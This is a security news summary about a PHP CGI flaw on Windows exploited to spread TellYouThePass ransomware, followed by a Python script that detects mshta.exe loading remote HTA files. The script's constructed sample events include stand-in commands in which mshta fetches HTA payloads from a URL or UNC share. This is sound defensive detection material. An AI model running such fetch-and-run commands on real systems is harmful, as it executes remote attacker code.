The vulnerability affects PHP when it runs in CGI mode, where the web server parses HTTP requests and passes them to a PHP script. Even when CGI mode is not enabled, the vulnerability can be exploited if the PHP executables are accessible to the web server, which is the default configuration on the XAMPP platform. The attack also requires the Windows locale to be set to Chinese or Japanese.
The vulnerability was disclosed on June 6, and within 24 hours attackers began exploiting it to install the TellYouThePass ransomware. The attackers used the mshta.exe Windows binary to execute HTML application files fetched from an attacker-controlled server, a living-off-the-land technique that relies on functionality built into the operating system to avoid detection.
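One way a defender can look for the living-off-the-land step described above, as an added example (this code is not from the Ars Technica report or from Censys): it parses constructed process-creation events and flags mshta.exe launches whose HTA argument is a URL or UNC path, raising the severity when the parent is a web-server process such as php-cgi.exe. The sample events, the field names and the list of web-server parent processes are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (Sysmon/EDR-style key=value lines).
# They are made up for this example and are not real telemetry.
SAMPLE_EVENTS = [
    'ParentImage=C:\\xampp\\php\\php-cgi.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta http://203.0.113.10/update.hta"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta C:\\Users\\alice\\tool.hta"',
    'ParentImage=C:\\xampp\\apache\\bin\\httpd.exe Image=C:\\xampp\\php\\php-cgi.exe CommandLine="php-cgi.exe"',
    'ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe \\\\198.51.100.7\\share\\a.hta"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Assumed set of parent images that should never legitimately spawn mshta.exe.
WEB_SERVER_PROCS = {"php-cgi.exe", "php.exe", "httpd.exe", "w3wp.exe"}

def parse_event(line):
    """Turn a key=value event line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def is_remote_hta_source(cmdline):
    """True if any mshta argument points at a network location (URL or UNC path)."""
    for token in cmdline.split()[1:]:
        if urlparse(token).scheme in ("http", "https") or token.startswith("\\\\"):
            return True
    return False

def classify(event):
    """Return a severity for an mshta.exe launch, or None for other processes."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return None
    remote = is_remote_hta_source(event.get("CommandLine", ""))
    from_web = parent in WEB_SERVER_PROCS
    if remote and from_web:
        return "high"    # remote HTA spawned by a web-server process
    if remote or from_web:
        return "medium"
    return "low"         # local HTA from an interactive parent

def scan(lines):
    """Return (event, severity) for every mshta.exe launch found in the input."""
    results = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            results.append((event, severity))
    return results

if __name__ == "__main__":
    for event, severity in scan(SAMPLE_EVENTS):
        print(severity, event["ParentImage"], "->", event["CommandLine"])
```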
Censys researchers observed the number of infected servers fluctuating between 670 and 1,800, with most infected hosts geolocated to China, Taiwan, Hong Kong, or Japan. The lack of observed ransom payments suggests that many compromised servers may have been decommissioned or gone offline. Security experts urge administrators running PHP on any Windows system to install the latest updates promptly to prevent further exploitation.
Source: Ars Technica
To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net, or you can try it yourself using check.website.